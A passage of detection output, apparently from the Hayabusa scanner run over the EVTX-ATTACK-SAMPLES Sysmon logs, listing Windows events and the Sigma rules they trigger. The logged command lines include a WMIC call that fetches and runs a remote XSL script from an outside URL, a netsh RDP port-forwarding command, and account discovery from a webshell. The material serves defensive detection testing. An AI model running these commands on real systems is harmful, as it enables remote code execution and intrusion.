365ABB72-C9C3-5CE4-0000-00101F422E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation_sysmon/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.736 +00:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:05.862 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:07.731 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:07.731 +00:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:08.208 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:08.422 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:49:09.576 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 16:50:44.582 +00:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-23 17:26:08.716 +00:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:26:08.716 +00:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:26:08.947 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:26:09.437 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-23 17:45:34.538 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-23 17:46:04.671 +00:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-23 17:46:04.671 +00:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-23 17:46:04.671 +00:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation_sysmon/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 01:33:53.112 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.112 +00:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation_sysmon/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.122 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.122 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.182 +00:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.182 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.182 +00:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.192 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.192 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 01:33:53.192 +00:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 15:38:21.485 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx +2019-05-26 04:01:42.385 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.385 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.545 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.966 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.966 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:42.966 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:43.567 +00:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:44.047 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 04:01:44.598 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 15:47:56.667 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.667 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.667 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.727 +00:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:56.727 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:57.628 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:57.628 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:57.628 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:58.830 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:47:59.871 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 